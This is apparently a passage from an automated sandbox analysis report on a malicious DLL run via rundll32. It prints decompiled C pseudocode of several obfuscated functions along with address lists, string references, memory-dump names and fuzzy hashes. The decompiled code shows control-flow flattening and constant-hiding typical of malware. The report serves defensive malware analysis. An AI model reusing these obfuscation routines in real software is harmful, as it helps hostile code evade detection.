							E1001551E(_a16,  &_v4, _v40, _t169, _t170, _v12 | _v8, _v44, _v16, _v24);
						} else {
							if(_t157 != 0x39bb1850) {
								L10:
								if(_t157 != 0x1d94fa77) {
									continue;
								} else {
								}
							} else {
								_push(_t157);
								_t170 = E100157E8(_v4 + _v4);
								if(_t170 != 0) {
									_t157 = 0x367d931e;
									continue;
								}
							}
						}
					}
					return _t170;
				}
				_t157 = 0x32a00bf2;
				goto L10;
			}

0x1000d0e5
0x1000d0e9
0x1000d0eb
0x1000d0ef
0x1000d0f3
0x1000d0f7
0x1000d0f8
0x1000d0f9
0x1000d0fe
0x1000d106
0x1000d109
0x1000d113
0x1000d11b
0x1000d11d
0x1000d122
0x1000d127
0x1000d12f
0x1000d137
0x1000d13c
0x1000d144
0x1000d14c
0x1000d150
0x1000d158
0x1000d160
0x1000d168
0x1000d170
0x1000d178
0x1000d180
0x1000d188
0x1000d18d
0x1000d195
0x1000d19d
0x1000d1a2
0x1000d1a7
0x1000d1af
0x1000d1be
0x1000d1c1
0x1000d1c5
0x1000d1cd
0x1000d1d5
0x1000d1dd
0x1000d1e2
0x1000d1ea
0x1000d1f7
0x1000d1fb
0x1000d203
0x1000d208
0x1000d210
0x1000d218
0x1000d21d
0x1000d225
0x1000d22d
0x1000d235
0x1000d23d
0x1000d245
0x1000d24d
0x1000d252
0x1000d25a
0x1000d26a
0x1000d26e
0x1000d273
0x1000d27b
0x1000d283
0x1000d28f
0x1000d292
0x1000d296
0x1000d29e
0x1000d2b5
0x1000d2b9
0x1000d2be
0x1000d2c6
0x1000d2d0
0x1000d322
0x1000d327
0x1000d32c
0x1000d32e
0x00000000
0x1000d32e
0x1000d2d2
0x1000d2d4
0x1000d364
0x1000d2d6
0x1000d2dc
0x1000d337
0x1000d33d
0x00000000
0x00000000
0x1000d33f
0x1000d2de
0x1000d2ea
0x1000d2f3
0x1000d2f8
0x1000d2fa
0x00000000
0x1000d2fa
0x1000d2f8
0x1000d2dc
0x1000d2d4
0x1000d375
0x1000d375
0x1000d335
0x00000000

Strings

k2, xrefs: 1000D144
|s?, xrefs: 1000D1CD
rZ, xrefs: 1000D296

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: k2$rZ$|s?
API String ID: 0-1348797666
Opcode ID: 1a504f0c04b87af0b1b48271f2f1a4297b55bdfd64aa91b8cb3f8916695204b1
Instruction ID: c5a9857de1bd72a55434b072a893e00a77e4adad4e3d5eb919c6f6467bcc56a9
Opcode Fuzzy Hash: 1a504f0c04b87af0b1b48271f2f1a4297b55bdfd64aa91b8cb3f8916695204b1
Instruction Fuzzy Hash: 84610E71109341AFD358CF25C88981FBBE1FB98788F50591DF5969A260D3B2CA49CF93

Uniqueness

Uniqueness Score: -1.00%

Function 1001DB25, Relevance: 3.9, Strings: 3, Instructions: 142
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E1001DB25(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				void* _t118;
				void* _t135;
				signed int _t138;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				void* _t144;
				void* _t163;
				signed int* _t166;

				_push(_a16);
				_t162 = _a4;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t118);
				_v96 = 0x6541;
				_t166 =  &(( &_v96)[6]);
				_v96 = _v96 ^ 0x91bfb37d;
				_v96 = _v96 >> 0x10;
				_t163 = 0;
				_v96 = _v96 << 0xe;
				_t144 = 0xd16dbf6;
				_v96 = _v96 ^ 0x246feaa2;
				_v80 = 0xafef;
				_v80 = _v80 + 0xd5f0;
				_v80 = _v80 >> 8;
				_v80 = _v80 ^ 0x000020f9;
				_v60 = 0x3fa;
				_v60 = _v60 << 8;
				_v60 = _v60 ^ 0x0003a875;
				_v68 = 0xdac3;
				_v68 = _v68 >> 4;
				_t138 = 0x79;
				_v68 = _v68 * 0x37;
				_v68 = _v68 ^ 0x0002ab2a;
				_v56 = 0xacb2;
				_v56 = _v56 << 3;
				_v56 = _v56 ^ 0x00056a81;
				_v72 = 0x451e;
				_v72 = _v72 << 0xa;
				_v72 = _v72 >> 1;
				_v72 = _v72 ^ 0x008a68a2;
				_v76 = 0xa9b5;
				_v76 = _v76 ^ 0x71c268bb;
				_v76 = _v76 >> 0xb;
				_v76 = _v76 ^ 0x000e50b8;
				_v84 = 0x733c;
				_v84 = _v84 + 0xffff2d0a;
				_v84 = _v84 | 0xc6f06430;
				_v84 = _v84 + 0xffffe838;
				_v84 = _v84 ^ 0xffffb7ce;
				_v88 = 0xd1fe;
				_v88 = _v88 / _t138;
				_v88 = _v88 | 0xc6561511;
				_t139 = 0x35;
				_v88 = _v88 / _t139;
				_v88 = _v88 ^ 0x03be11ae;
				_v64 = 0xb503;
				_v64 = _v64 ^ 0x4b2bbc6a;
				_v64 = _v64 + 0xffffbb02;
				_v64 = _v64 ^ 0x4b2ab619;
				_v92 = 0x25d2;
				_t140 = 0x57;
				_v92 = _v92 * 0x42;
				_v92 = _v92 / _t140;
				_t141 = 0x2f;
				_v92 = _v92 / _t141;
				_v92 = _v92 ^ 0x00006e4e;
				do {
					while(_t144 != 0xd16dbf6) {
						if(_t144 == 0x14ed0f49) {
							__eflags = E1001D290(_v84, _v88, _v64, _t162 + 8, _v92,  &_v52);
							_t163 =  !=  ? 1 : _t163;
						} else {
							if(_t144 == 0x2713230a) {
								_t135 = E10009899(_t162, _v68, __eflags,  &_v52, _v56, _v72, _v76);
								_t166 =  &(_t166[4]);
								__eflags = _t135;
								if(__eflags != 0) {
									_t144 = 0x14ed0f49;
									continue;
								}
							} else {
								if(_t144 != 0x2ae8b971) {
									goto L9;
								} else {
									E1001F3E9(_v96, _v80, _v60, _a12,  &_v52);
									_t166 =  &(_t166[3]);
									_t144 = 0x2713230a;
									continue;
								}
							}
						}
						L12:
						return _t163;
					}
					_t144 = 0x2ae8b971;
					L9:
					__eflags = _t144 - 0x88de44a;
				} while (__eflags != 0);
				goto L12;
			}

0x1001db2c
0x1001db33
0x1001db37
0x1001db3e
0x1001db45
0x1001db46
0x1001db47
0x1001db48
0x1001db4d
0x1001db55
0x1001db58
0x1001db62
0x1001db67
0x1001db69
0x1001db6e
0x1001db73
0x1001db7b
0x1001db83
0x1001db8b
0x1001db90
0x1001db98
0x1001dba0
0x1001dba5
0x1001dbad
0x1001dbb5
0x1001dbc1
0x1001dbc4
0x1001dbc8
0x1001dbd0
0x1001dbd8
0x1001dbdd
0x1001dbe5
0x1001dbed
0x1001dbf2
0x1001dbf6
0x1001dbfe
0x1001dc06
0x1001dc0e
0x1001dc13
0x1001dc1b
0x1001dc23
0x1001dc2b
0x1001dc33
0x1001dc3b
0x1001dc43
0x1001dc53
0x1001dc57
0x1001dc63
0x1001dc68
0x1001dc6e
0x1001dc76
0x1001dc7e
0x1001dc86
0x1001dc8e
0x1001dc96
0x1001dca3
0x1001dca6
0x1001dcb2
0x1001dcba
0x1001dcbd
0x1001dcc6
0x1001dcd3
0x1001dcd3
0x1001dcdd
0x1001dd69
0x1001dd6b
0x1001dcdf
0x1001dce5
0x1001dd29
0x1001dd2e
0x1001dd31
0x1001dd33
0x1001dd35
0x00000000
0x1001dd35
0x1001dce7
0x1001dce9
0x00000000
0x1001dceb
0x1001dd03
0x1001dd08
0x1001dd0b
0x00000000
0x1001dd0b
0x1001dce9
0x1001dce5
0x1001dd6f
0x1001dd77
0x1001dd77
0x1001dd39
0x1001dd3b
0x1001dd3b
0x1001dd3b
0x00000000

Strings

<s, xrefs: 1001DC1B
Nn, xrefs: 1001DCC6
Ae, xrefs: 1001DB4D

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: <s$Ae$Nn
API String ID: 0-1679991533
Opcode ID: 92a5fa941ec84b2a13816d9790ac9f10e8bf9b01ff2aa242d1ce98f0185b00fe
Instruction ID: a6ffe0389ab2164942154368da0f3f4b89edecd288a42e9cb3f2d23efd3a417b
Opcode Fuzzy Hash: 92a5fa941ec84b2a13816d9790ac9f10e8bf9b01ff2aa242d1ce98f0185b00fe
Instruction Fuzzy Hash: 995176712083419FD358EF21D88951BBBE1FBC8348F508A1DF59996260D7B5CA49CF83

Uniqueness

Uniqueness Score: -1.00%

Function 10010F6D, Relevance: 3.9, Strings: 3, Instructions: 125
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10010F6D() {
				signed char _v2;
				signed int _v276;
				signed int _v280;
				char _v284;
				signed short _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				void* _t107;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				intOrPtr _t123;
				signed int* _t125;

				_t125 =  &_v368;
				_v336 = 0x6cd7e4;
				_v332 = 0x3eb088;
				_t107 = 0x11f8fc3e;
				_t123 = 0;
				_v328 = 0;
				_v324 = 0;
				_v340 = 0x4b20;
				_v340 = _v340 | 0xad173eb8;
				_v340 = _v340 ^ 0xad171b79;
				_v368 = 0x5c5a;
				_v368 = _v368 | 0x9193e072;
				_v368 = _v368 ^ 0x84c7a0cb;
				_t119 = 0x62;
				_v368 = _v368 / _t119;
				_v368 = _v368 ^ 0x0037af10;
				_v352 = 0x141d;
				_v352 = _v352 + 0xbd3d;
				_t120 = 0x7c;
				_v352 = _v352 * 7;
				_v352 = _v352 ^ 0x0005e092;
				_v344 = 0x5f9b;
				_v344 = _v344 | 0x8244af57;
				_v344 = _v344 ^ 0x8244aa36;
				_v360 = 0xe6d9;
				_v360 = _v360 + 0xa592;
				_v360 = _v360 / _t120;
				_t121 = 0x1b;
				_v360 = _v360 * 0x3c;
				_v360 = _v360 ^ 0x0000cf96;
				_v356 = 0x3abe;
				_v356 = _v356 >> 0x10;
				_v356 = _v356 >> 6;
				_v356 = _v356 ^ 0x00000525;
				_v364 = 0x1f65;
				_v364 = _v364 >> 6;
				_v364 = _v364 * 0x16;
				_v364 = _v364 | 0xfb440427;
				_v364 = _v364 ^ 0xfb445ef1;
				_v348 = 0x48;
				_v348 = _v348 / _t121;
				_v348 = _v348 ^ 0x0000083a;
				do {
					while(_t107 != 0x2ebf197) {
						if(_t107 == 0x11f8fc3e) {
							_t107 = 0x2ebf197;
							continue;
						} else {
							if(_t107 == 0x13d7564d) {
								_t107 = 0x32df2d5c;
								_t123 = _t123 + (_v2 & 0x000000ff) * 0x186a0;
								continue;
							} else {
								if(_t107 == 0x2725b2a4) {
									E10008EB8(_v360, _v356,  &_v320, _v364, _v348);
									_t125 =  &(_t125[3]);
									_t107 = 0x13d7564d;
									continue;
								} else {
									if(_t107 == 0x2976fc0f) {
										_t123 = _t123 + (_v320 & 0x0000ffff);
									} else {
										if(_t107 == 0x2ab6fad8) {
											_t107 = 0x2976fc0f;
											_t123 = _t123 + _v276 * 0x64;
											continue;
										} else {
											if(_t107 != 0x32df2d5c) {
												goto L14;
											} else {
												_t107 = 0x2ab6fad8;
												_t123 = _t123 + _v280 * 0x3e8;
												continue;
											}
										}
									}
								}
							}
						}
						L17:
						return _t123;
					}
					_v284 = 0x11c;
					E10018EA4(_v340, _v368,  &_v284, _v352, _v344);
					_t125 =  &(_t125[3]);
					_t107 = 0x2725b2a4;
					L14:
				} while (_t107 != 0x1e073579);
				goto L17;
			}

0x10010f6d
0x10010f73
0x10010f7d
0x10010f85
0x10010f8d
0x10010f94
0x10010f9d
0x10010fa1
0x10010fa9
0x10010fb1
0x10010fb9
0x10010fc1
0x10010fc9
0x10010fd8
0x10010fdd
0x10010fe3
0x10010feb
0x10010ff3
0x10011000
0x10011003
0x10011007
0x1001100f
0x10011017
0x1001101f
0x10011027
0x1001102f
0x1001103f
0x10011048
0x10011049
0x1001104d
0x10011055
0x1001105d
0x10011062
0x10011067
0x1001106f
0x10011077
0x10011081
0x10011085
0x1001108d
0x10011095
0x100110a8
0x100110ac
0x100110b4
0x100110b4
0x100110c2
0x10011143
0x00000000
0x100110c4
0x100110ca
0x10011131
0x1001113c
0x00000000
0x100110cc
0x100110d2
0x1001111a
0x1001111f
0x10011122
0x00000000
0x100110d4
0x100110d6
0x10011187
0x100110dc
0x100110de
0x100110ff
0x10011101
0x00000000
0x100110e0
0x100110e6
0x00000000
0x100110ec
0x100110f4
0x100110f6
0x00000000
0x100110f6
0x100110e6
0x100110de
0x100110d6
0x100110d2
0x100110ca
0x1001118a
0x10011195
0x10011195
0x10011152
0x10011167
0x1001116c
0x1001116f
0x10011174
0x10011174
0x00000000

Strings

H, xrefs: 10011095
K, xrefs: 10010FA1
Z\, xrefs: 10010FB9

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: K$H$Z\
API String ID: 0-1080206182
Opcode ID: 7acbd81a9cb121969d6a9ac1592260c1e46ce6c2f983d3fe9c9f259f75efb378
Instruction ID: 3bc7b4ca0c7fcb2c5b05920913665c9c43f334923cd28bf2cbd3076ac86a8cde
Opcode Fuzzy Hash: 7acbd81a9cb121969d6a9ac1592260c1e46ce6c2f983d3fe9c9f259f75efb378
Instruction Fuzzy Hash: D7516771908341DFD319CE22D94545FBBE1EBC8748F108A1EF586AA260D3B5CA89CF97

Uniqueness

Uniqueness Score: -1.00%

Function 1001654F, Relevance: 3.9, Strings: 3, Instructions: 122
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E1001654F(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				char _v592;
				void* _t137;
				signed int _t155;
				signed int _t156;
				signed int _t157;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t137);
				_v68 = _v68 & 0x00000000;
				_v72 = 0x40327f;
				_v36 = 0xc85d;
				_v36 = _v36 ^ 0x66282df1;
				_v36 = _v36 << 7;
				_v36 = _v36 ^ 0x1472a435;
				_v64 = 0xf491;
				_v64 = _v64 + 0xa329;
				_v64 = _v64 ^ 0x0001adca;
				_v40 = 0xc364;
				_v40 = _v40 >> 8;
				_v40 = _v40 | 0x488121d4;
				_v40 = _v40 ^ 0x48816408;
				_v52 = 0x6da2;
				_v52 = _v52 >> 1;
				_v52 = _v52 ^ 0x0000495a;
				_v8 = 0x312a;
				_v8 = _v8 + 0xffffef42;
				_t155 = 0x2c;
				_v8 = _v8 * 0x65;
				_v8 = _v8 + 0xce6d;
				_v8 = _v8 ^ 0x000de244;
				_v20 = 0x8561;
				_v20 = _v20 | 0x5ebc884e;
				_v20 = _v20 + 0x1144;
				_v20 = _v20 + 0xfffffd3c;
				_v20 = _v20 ^ 0x5ebcfa0f;
				_v12 = 0x1c9b;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 / _t155;
				_v12 = _v12 + 0x2960;
				_v12 = _v12 ^ 0x00001be2;
				_v60 = 0x3552;
				_t156 = 0x2b;
				_v60 = _v60 / _t156;
				_v60 = _v60 ^ 0x00001bfb;
				_v24 = 0xfa61;
				_v24 = _v24 >> 4;
				_v24 = _v24 | 0xfe7fc8bf;
				_v24 = _v24 ^ 0xfe7fec18;
				_v44 = 0xf8e3;
				_t157 = 0x73;
				_v44 = _v44 * 0x4c;
				_v44 = _v44 ^ 0x0049ee51;
				_v16 = 0x71dd;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 << 0xd;
				_v16 = _v16 * 0xd;
				_v16 = _v16 ^ 0x0016ae67;
				_v56 = 0x9b34;
				_v56 = _v56 / _t157;
				_v56 = _v56 ^ 0x000036fa;
				_v28 = 0xc6c;
				_v28 = _v28 + 0xfffffa1a;
				_v28 = _v28 + 0xffff7ee3;
				_v28 = _v28 ^ 0xffff83ef;
				_v48 = 0x101f;
				_v48 = _v48 | 0x367cb3d5;
				_v48 = _v48 ^ 0x367cc432;
				_v32 = 0x8972;
				_v32 = _v32 + 0x5a70;
				_v32 = _v32 ^ 0x29e9990a;
				_v32 = _v32 ^ 0x29e93145;
				_push(0x100015f0);
				_push(_v40);
				E10013D3D(E1001BF25(_v36, _v64, _v32), _v32, _v52, _v8,  &_v592, _v20, _v36, _v12);
				E1001C5F7(_v60, _v24, _v44, _v16, _t148);
				return E10003CA0(_v56, _v28, _v48,  &_v592, _v32);
			}

0x10016559
0x1001655c
0x1001655f
0x10016560
0x10016561
0x10016566
0x1001656c
0x10016573
0x1001657a
0x10016581
0x10016585
0x1001658c
0x10016593
0x1001659a
0x100165a1
0x100165a8
0x100165ac
0x100165b3
0x100165ba
0x100165c1
0x100165c4
0x100165cb
0x100165d2
0x100165df
0x100165e2
0x100165e5
0x100165ec
0x100165f3
0x100165fa
0x10016601
0x10016608
0x1001660f
0x10016616
0x1001661d
0x10016628
0x1001662b
0x10016632
0x10016639
0x10016643
0x10016648
0x1001664d
0x10016654
0x1001665b
0x1001665f
0x10016666
0x1001666d
0x10016678
0x10016679
0x1001667c
0x10016683
0x1001668a
0x1001668e
0x10016696
0x10016699
0x100166a0
0x100166ac
0x100166af
0x100166b6
0x100166bd
0x100166c4
0x100166cb
0x100166d2
0x100166d9
0x100166e0
0x100166e7
0x100166ee
0x100166f5
0x100166fc
0x10016703
0x10016708
0x10016734
0x10016746
0x1001676a

Strings

D, xrefs: 100165EC
E1), xrefs: 100166FC
QI, xrefs: 1001667C

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: D$E1)$QI
API String ID: 0-3224676359
Opcode ID: de472776899f0c55f1eb6eaae90afa3064a2a91ca96fd091b97d902bbcfec4df
Instruction ID: 4748c6fc59a3130118217356d11503de5a80fd968bd88dd6c5efbc71458b5f5e
Opcode Fuzzy Hash: de472776899f0c55f1eb6eaae90afa3064a2a91ca96fd091b97d902bbcfec4df
Instruction Fuzzy Hash: 7051DE75D0120DABEF08CFA5D98A8EEBBB2FF04314F208159E415B62A0D7B95A45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1000213E, Relevance: 3.9, Strings: 3, Instructions: 107
COMMONCrypto

Download Yara Rule

C-Code - Quality: 63%

			E1000213E(intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				void* _t117;
				void* _t119;
				intOrPtr* _t120;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				intOrPtr* _t138;

				_v52 = _v52 & 0x00000000;
				_v56 = 0x538da4;
				_v28 = 0x44a2;
				_v28 = _v28 + 0xffff49a8;
				_v28 = _v28 ^ 0x9ec4eed9;
				_v28 = _v28 ^ 0x613b19df;
				_v24 = 0xfb1d;
				_v24 = _v24 | 0x73dd884d;
				_v24 = _v24 >> 0x10;
				_v24 = _v24 ^ 0x000060fc;
				_v20 = 0x4538;
				_v20 = _v20 << 1;
				_v20 = _v20 >> 1;
				_v20 = _v20 ^ 0x0000423d;
				_v16 = 0x1a69;
				_v16 = _v16 + 0x19e4;
				_v16 = _v16 << 6;
				_t123 = 0x59;
				_v16 = _v16 * 0x7f;
				_v16 = _v16 ^ 0x067cf58b;
				_v12 = 0x7ce6;
				_v12 = _v12 | 0x92d22600;
				_v12 = _v12 >> 3;
				_v12 = _v12 | 0x69c09952;
				_v12 = _v12 ^ 0x7bda88d4;
				_v8 = 0xdbf1;
				_v8 = _v8 >> 2;
				_t138 = _a4;
				_v8 = _v8 * 0x21;
				_t124 = 0x64;
				_v8 = _v8 / _t123;
				_v8 = _v8 ^ 0x00003399;
				_v44 = 0x6316;
				_v44 = _v44 / _t124;
				_v44 = _v44 ^ 0x000016b9;
				_v40 = 0xc759;
				_v40 = _v40 << 5;
				_v40 = _v40 | 0x59fc130f;
				_v40 = _v40 ^ 0x59fcaabc;
				_v36 = 0xd1fd;
				_t125 = 0x6d;
				_v36 = _v36 / _t125;
				_v36 = _v36 ^ 0x863f9c53;
				_v36 = _v36 ^ 0x863f9a9b;
				_v32 = 0x7363;
				_v32 = _v32 + 0xffffb442;
				_v32 = _v32 + 0xab3e;
				_v32 = _v32 ^ 0x0000a443;
				_v48 = 0x2890;
				_v48 = _v48 * 0x6e;
				_v48 = _v48 ^ 0x00113212;
				_t117 =  *((intOrPtr*)(_t138 + 0x1c))( *_t138, 1, 0);
				_t145 = _t117;
				if(_t117 != 0) {
					_push(_v20);
					_push(_v24);
					_t119 = E10012164(0x10001338, _v28, _t145);
					_t140 = _t119;
					_push(_t119);
					_push(_v44);
					_push( *_t138);
					_push(_v8);
					_t120 = E10003892(_v16, _v12);
					if(_t120 != 0) {
						 *_t120();
					}
					E1001C5F7(_v40, _v36, _v32, _v48, _t140);
				}
				return 0;
			}

0x10002144
0x1000214a
0x10002151
0x10002158
0x1000215f
0x10002166
0x1000216d
0x10002174
0x1000217b
0x1000217f
0x10002186
0x1000218d
0x10002190
0x10002193
0x1000219a
0x100021a1
0x100021a8
0x100021b3
0x100021b6
0x100021b9
0x100021c0
0x100021c7
0x100021ce
0x100021d2
0x100021d9
0x100021e0
0x100021e7
0x100021ef
0x100021f2
0x100021fa
0x100021fb
0x10002200
0x10002207
0x10002215
0x1000221a
0x10002221
0x10002228
0x1000222c
0x10002233
0x1000223a
0x10002244
0x10002249
0x1000224c
0x10002253
0x1000225a
0x10002261
0x10002268
0x1000226f
0x10002276
0x10002283
0x10002286
0x1000228f
0x10002292
0x10002294
0x10002297
0x1000229f
0x100022a5
0x100022aa
0x100022ac
0x100022ad
0x100022b0
0x100022b2
0x100022bb
0x100022c5
0x100022c7
0x100022c7
0x100022d6
0x100022de
0x100022e5

Strings

|, xrefs: 100021C0
cs, xrefs: 1000225A
=B, xrefs: 10002193

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: =B$cs$|
API String ID: 0-3098575777
Opcode ID: 26e771be288bcedb70c4e1769d7f3287c900998a71bd65c4af8e96d7d77837dd
Instruction ID: f3f3b864e56cb41531de165bc9f4fd19ac00324e8386bf07003281ad5c508310
Opcode Fuzzy Hash: 26e771be288bcedb70c4e1769d7f3287c900998a71bd65c4af8e96d7d77837dd
Instruction Fuzzy Hash: 39512371D00209EBEF08CFA1C94A6EEBBB2FB08314F208059D511B6290D7BA5B54CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 10005EB9, Relevance: 3.9, Strings: 3, Instructions: 106
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E10005EB9(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _t95;
				intOrPtr _t97;
				intOrPtr _t106;
				signed int _t107;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr _t120;
				intOrPtr* _t121;
				void* _t122;
				intOrPtr _t123;

				_v28 = 0x51db;
				_v28 = _v28 * 0x56;
				_v28 = _v28 ^ 0xf2cb6318;
				_v28 = _v28 ^ 0xf2d01fca;
				_v12 = 0x641f;
				_t107 = 0x36;
				_v12 = _v12 * 0x49;
				_v12 = _v12 ^ 0x001cda68;
				_v24 = 0xc595;
				_v24 = _v24 | 0x40e4949d;
				_v24 = _v24 >> 6;
				_v24 = _v24 ^ 0x0103f279;
				_v36 = 0xae24;
				_v36 = _v36 >> 0xe;
				_v36 = _v36 << 1;
				_v36 = _v36 << 0xe;
				_v36 = _v36 ^ 0x0001302d;
				_v20 = 0x229b;
				_v20 = _v20 | 0xaeee7ef1;
				_v20 = _v20 ^ 0xaeee687d;
				_v8 = 0x637e;
				_v8 = _v8 / _t107;
				_v8 = _v8 ^ 0x000003e0;
				_v4 = 0xedda;
				_v4 = _v4 | 0x32cb1c6d;
				_v4 = _v4 ^ 0x32cbfe7d;
				_v16 = 0xace9;
				_v16 = _v16 * 3;
				_v16 = _v16 >> 3;
				_v16 = _v16 ^ 0x00006a5d;
				_v32 = 0xe450;
				_v32 = _v32 | 0xfff2f3f7;
				_v32 = _v32 ^ 0x3a9b7228;
				_v32 = _v32 ^ 0xc569ebde;
				_t95 = E10014237();
				_t120 = _a4;
				_t122 = _t95;
				_v28 = 0x89bb;
				_v28 = _v28 ^ 0xf4290def;
				_v28 = _v28 + 0xffff042c;
				_v28 = _v28 ^ 0xf4288880;
				_t124 = _t120 + 0x24;
				_t106 = E1001C424(_t120 + 0x24, _v36);
				_t97 =  *((intOrPtr*)(_t120 + 8));
				if(_t97 != _v28 && _t97 != _t122) {
					_t110 =  *((intOrPtr*)(_t120 + 0x18));
					if(_t110 != _v28 && _t110 != _t122) {
						_t121 = _a8;
						_t111 =  *_t121;
						if(E10008B2D(_t111, _t106) == 0) {
							_push(_t111);
							_t123 = E100157E8(0x234);
							if(_t123 != 0) {
								_t83 = _t123 + 0x2c; // 0x2c
								E10015891(_t124, _t83, _v4, _v16, _v32);
								 *((intOrPtr*)(_t123 + 0x24)) = _t106;
								 *((intOrPtr*)(_t123 + 0x1c)) =  *_t121;
								 *_t121 = _t123;
							}
						}
					}
				}
				return 1;
			}

0x10005ebc
0x10005ecf
0x10005ed3
0x10005edb
0x10005ee3
0x10005ef2
0x10005ef3
0x10005ef7
0x10005eff
0x10005f07
0x10005f0f
0x10005f14
0x10005f1c
0x10005f24
0x10005f29
0x10005f2d
0x10005f32
0x10005f3a
0x10005f42
0x10005f4a
0x10005f52
0x10005f60
0x10005f64
0x10005f6c
0x10005f74
0x10005f7c
0x10005f84
0x10005f91
0x10005f95
0x10005f9a
0x10005fa2
0x10005faa
0x10005fb2
0x10005fba
0x10005fca
0x10005fcf
0x10005fd3
0x10005fd5
0x10005fdd
0x10005fe5
0x10005fed
0x10005ff5
0x10006007
0x10006009
0x10006011
0x10006017
0x1000601e
0x10006024
0x1000602a
0x10006033
0x1000603d
0x10006048
0x1000604d
0x10006053
0x10006060
0x10006065
0x1000606d
0x10006070
0x10006070
0x1000604d
0x10006033
0x1000601e
0x1000607c

Strings

P, xrefs: 10005FA2
~c, xrefs: 10005F52
]j, xrefs: 10005F9A

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: P$]j$~c
API String ID: 0-2734922740
Opcode ID: 2ddae0401af973571d1696ec4368973d25313382c46e7bfc25bb53ccb91cfd1f
Instruction ID: ea7cc22da0d58e888ac6ae18cd3838caf37ee5c895773eb993b6b9e4d83255ea
Opcode Fuzzy Hash: 2ddae0401af973571d1696ec4368973d25313382c46e7bfc25bb53ccb91cfd1f
Instruction Fuzzy Hash: 9B41E2755083429FD358CF21D58641BFBE1FB88798F104A1DF4DAA6264C374EA89CF86

Uniqueness

Uniqueness Score: -1.00%

Function 10008816, Relevance: 3.8, Strings: 3, Instructions: 99
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10008816(intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				char _v116;
